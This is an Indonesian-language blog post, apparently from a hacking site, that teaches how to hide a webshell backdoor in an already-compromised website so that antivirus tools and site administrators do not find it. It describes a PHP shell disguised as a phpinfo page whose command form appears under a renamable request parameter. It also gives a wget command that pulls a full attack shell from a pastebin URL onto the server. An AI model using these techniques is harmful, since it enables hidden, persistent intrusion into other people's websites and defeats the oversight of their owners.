Halo apakabar? Pada post kali ini, kami mau berbagi sedikit trik. kalian sudah tahu webshell kan? iya, semacam WSO, galerz, indoxploit shell, be7ak, dan lain sebagainya.
Shell atau backdoor memang sering memudahkan para attacker maupun pentester untuk menggali informasi, memodifikasi, dan lain sebagainya pada website yang diserang. tapi sayang, beberapa web shell kadang langsung terdeteksi sebagai virus, oleh antivirus PC, maupun antivirus server, dan juga dapat di kenali oleh admin website.
Pada postingan kami sebelumnya kami telah membuat post Hidden Uploader 404 & Hidden uploader Versi MnHBlog Kalian bisa Memilih mana yang lebih simple.
jadi sekarang ini, Kami mau berbagi informasi mengenai cara menyembunyikan webshell di website. oke langsung simak saja.
Anggap saja Kalian sudah ada webshell / Backdoor di website. Dan berikut adalah source code backdoor yang harus kalian copas.
ini adalah shell super simple, dimana tampilannya adalah php info, tahukan php info? yap, informasi mengenai php di server. kemudian jika di beri parameter ?cmd maka akan keluar form, yang mana Kalian bisa memasukan command sistem, seperti ls, wget, uname, dan lain-lain.
Cara Menyembunyikan & Memanggil Backdoor?
Pada bagian if(isset($_REQUEST['cmd'])) , cmd bisa kalian ganti dengan nama apapun, misal ganteng, terserah, maka pemanggilannya adalah contoh.php?ganteng#
mungkin shell ini adalah mode 'sleep' dari exploit kalian, jadi jika kalian masih ingin menggunakan shell biasa seperti wso, galerz, indoxploit shell, tinggal menggunakan command seperti ini 'wget http://pastebin.com/raw/shellmu -O shell.php' pada bagian pastebin bisa di ganti alamat pastebin shell kalian dalam mode raw, maka shell.php akan menjadi shellmu.
